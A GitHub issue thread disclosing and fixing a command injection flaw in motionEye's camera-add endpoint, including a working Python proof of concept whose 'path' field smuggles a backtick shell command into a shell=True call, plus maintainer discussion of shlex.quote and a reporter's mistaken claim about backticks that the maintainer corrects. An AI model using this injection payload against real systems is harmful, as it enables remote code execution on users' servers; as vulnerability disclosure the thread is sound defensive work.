motioneye-project/motioneye #3142: [Security] RCE in add_camera Function Due to unsafe command execution in [motioneye-project/motioneye]

hyperlyz, 2025-05-13:
# Summary
When user is runing motioneye, attacker via /config/add to achieve RCE by sending carefully crafted data.

function call stack:
post
add_camera
config.add_camera
v4l2ctl.list_resolutions
utils.call_subprocess
subprocess.run

# POC
## build
```shell
RUN_USER="user"
RUN_UID=$(id -u ${RUN_USER})
RUN_GID=$(id -g ${RUN_USER})
TIMESTAMP="$(date '+%Y%m%d-%H%M')"

docker build \
  --network host \
  --build-arg="RUN_UID=${RUN_UID?}" \
  --build-arg="RUN_GID=${RUN_GID?}" \
  -t "${USER?}/motioneye:${TIMESTAMP}" \
  --no-cache \
  -f docker/Dockerfile .
```

## reproduce
* run: ```docker run --rm  -d   -p 8765:8765   --hostname="motioneye"   -v /etc/localtime:/etc/localtime:ro   -v /tmp/motioneyeconfig:/etc/motioneye   -v /tmp/motioneyeconfig:/var/lib/motioneye ```
```
bash-4.2$ docker logs ceb435eacf55 -f
configure_logging cmd motioneye: False
configure logging to file: None
    INFO: hello! this is motionEye server 0.43.1b3
   DEBUG: found motion executable "/usr/bin/motion" version "4.7.0"
   DEBUG: found ffmpeg executable "/usr/bin/ffmpeg" version "7.1.1-1+b1"
   DEBUG: listing config dir /etc/motioneye...
   DEBUG: found camera with id 1
   DEBUG: reading camera config from /etc/motioneye/camera-1.conf...
   DEBUG: loading additional config structure for camera, without separators
   DEBUG: Using selector: EpollSelector
   DEBUG: searching motion executable
   DEBUG: starting motion executable "/usr/bin/motion" version "4.7.0"
    INFO: cleanup started
    INFO: wsswitch started
    INFO: tasks started
    INFO: mjpg customer garbage collector has started
    INFO: server started
```
* now, run the following script to attack motioneye:
```python
import requests
import json

url = "http://your_ip:8765/config/add?_username=admin&_signature=c22baef3399cb7328e22ded1ca68395b4daecd18"

payload = json.dumps({
  "proto": "v4l2",
  "path": "' `touch /tmp/bbbb` '"
})
headers = {
  'Content-Type': 'application/json'
}

response = requests.request("POST", url, headers=headers, data=payload)

print(response.text)
```

[image]

[image]

## Discussion
It is obvious that call_subprocess was used to execute the incoming data, resulting in a vulnerability
```python
def list_resolutions(device):
    from motioneye import motionctl

    device = utils.make_str(device)

    if device in _resolutions_cache:
        return _resolutions_cache[device]

    logging.debug(f'listing resolutions of device {device}...')

    resolutions = set()
    output = b''
    started = time.time()
    cmd = f"v4l2-ctl -d '{device}' --list-formats-ext | grep -vi stepwise | grep -oE '[0-9]+x[0-9]+' || true"
    logging.debug(f'running command "{cmd}"')

    try:
        output = utils.call_subprocess(cmd, shell=True, stderr=utils.DEV_NULL)
    except:
        logging.error(f'failed to list resolutions of device "{device}"')

    output = utils.make_str(output)

def call_subprocess(
    args,
    stdin=None,
    input=None,
    stdout=subprocess.PIPE,
    stderr=DEV_NULL,
    capture_output=False,
    shell=False,
    cwd=None,
    timeout=None,
    check=True,
    encoding='utf-8',
    errors=None,
    text=None,
    env=None,
) -> str:
    """subprocess.run wrapper to return output as a decoded string"""
    return subprocess.run(
        args,
        stdin=stdin,
        input=input,
        stdout=stdout,
        stderr=stderr,
        capture_output=capture_output,
        shell=shell,
        cwd=cwd,
        timeout=timeout,
        check=check,
        encoding=encoding,
        errors=errors,
        text=text,
        env=env,
    ).stdout.strip()
```

# Imapct
RCE

# Credit
The vulnerability was discovered by Tencent YunDing Security Lab.

MichaIng, 2025-05-13:
Thanks, I guess this is what we need on the `device` input: https://docs.python.org/3/library/shlex.html#shlex.shlex.quotes

Splitting the arguments, not executing them in shell context, and doing parsing of the output in Python instead of in shell is another thing I would apply thoroughly in the code, whenever `call_subprocess` is used. But that is more work.

MichaIng, 2025-05-13:
Could you test it again with: #3143

Btw, we have private vulnerability reporting enabled on this repository. Generally better to report that way first, so we have a chance to push a fix before making it public.

hyperlyz, 2025-05-13:
> Could you test it again with: [#3143](https://github.com/motioneye-project/motioneye/pull/3143)
> 
> Btw, we have private vulnerability reporting enabled on this repository. Generally better to report that way first, so we have a chance to push a fix before making it public.

I'm sorry for that report a public vulnerability before push a fix. The core logic of shlex.quote() is to wrap the input string in single quotes and escape any internal single quotes as '\'' (i.e., '"'"'), which prevents structural closure of shell arguments. However, this method cannot protect against backtick (`) characters. We suggest implementing the following fix:

1. Avoid using shell=True parameter to prevent command interpreter from executing malicious code. 
2. Replace string concatenation with argument list, modify the command to: ["v4l2-ctl", "-d", device, "--list-formats-ext"]. 
3. Implement allowlist validation for device parameter using regular expression filtering, e.g., re.match(r"^/dev/video\d+$", device). 
4. Remove pipe operators (|) and implement grep filtering logic in Python code. Modified secure code example: cmd = ["v4l2-ctl", "-d", device, "--list-formats-ext"]; output = utils.call_subprocess(cmd, shell=False)

MichaIng, 2025-05-13:
> The core logic of shlex.quote() is to wrap the input string in single quotes and escape any internal single quotes as ''' (i.e., '"'"'), which prevents structural closure of shell arguments. [...]

The first part is true, but the second part not: Single-quoted arguments in shell are not expanded in any case, not backticks, no `$()` command substitutions or any similar, they are taken literal. The only thing which naturally cannot be taken literally within single quotes are single quotes. And since `shlex.quote()` escapes them with `'"'"'` (an alternative would be `'\''`), the input is assured to be taken literal.

The only way this can be broken is quoting the `shlex.quote`d input within the Python string, since then in the shell the whole input appears as double-quoted, allowing command substitution, or it inverts the shlex quotes, leaving the input unquoted.

Something to play around with:
```py
import shlex
import subprocess

input = "'`touch testfile`"
input = shlex.quote(input)
print('Excaped input: ', input)
cmd = f"echo 'Arg within shell: ' {input}; ls -l testfile && rm testfile"
print('Command: ', cmd)
subprocess.run(cmd, shell=True)
```

As said in my first comment, I agree we should not use `shell=True` at all and do all parsing in Python. But for now I want to fix the vulnerability quickly, and not do changes which could potentially break expected behavior, and hence needs further tests. I am a shell wizard, but not Python wizard, so I'd need more time to do parsing in Python properly, if no one else finds the time 🙂.

MichaIng, 2025-05-13:
@hyperlyz 
Could you check back whether I misunderstood or overlooked something? So I can push the fix and a new beta. As said, within a single-quoted string, and contained single quotes escaped (well, ending the quotation, adding a literal single quote, then restarting quotation, what `'"'"'` does), no variable/command/any expansion/substitution happens. Single quotes in shell pass everything literal, there is not even an escape character, consequently.

hyperlyz, 2025-05-14:
> [@hyperlyz](https://github.com/hyperlyz) Could you check back whether I misunderstood or overlooked something? So I can push the fix and a new beta. As said, in UNIX shells, within a single-quoted string, and in case contained single quotes escaped (well, ending the quotation, adding a literal single quote, then restarting quotation, what `'"'"'` does), no variable/command/any expansion/substitution happens. Single quotes in UNIX shell pass everything literal, there is not even an escape character, consequently.

Hi, @MichaIng 

Based on the patch you provided, I conducted security testing and verified that it successfully blocks malicious command injection attacks. But, I would recommend following security best practices to refactor this functionality when time permits, to ensure more robust long-term protection. 

I have reported a remote code execution (RCE) vulnerability in the project and provided steps to reproduce and a proof of concept. As this vulnerability may pose a serious security threat to project users, I suggest applying for a **CVE** number for this vulnerability to facilitate tracking and disclosure. I would like to ask if you can assist in submitting a CVE request or if there is a specific process that I need to cooperate with? If additional information or support is required, I am happy to provide it.

Thank you for your attention and support for project security!

Best wishes,
hyperlyz

MichaIng, 2025-05-14:
Thanks for verifying. And yes, I agree we should ban `shell=True` in general.

EpicLPer, 2025-05-16:
Btw. as a potential side comment (or more a "fyi" for you), it seems a big part of the answers from @hyperlyz are AI genereated...

MichaIng, 2025-05-16:
Possible, but would not change something about its validity and importance. No problem to make use of the tools AI provide, as long as the content/outcome is checked.

As the beta which fixes the vulnerability has been released, I'll close this issue.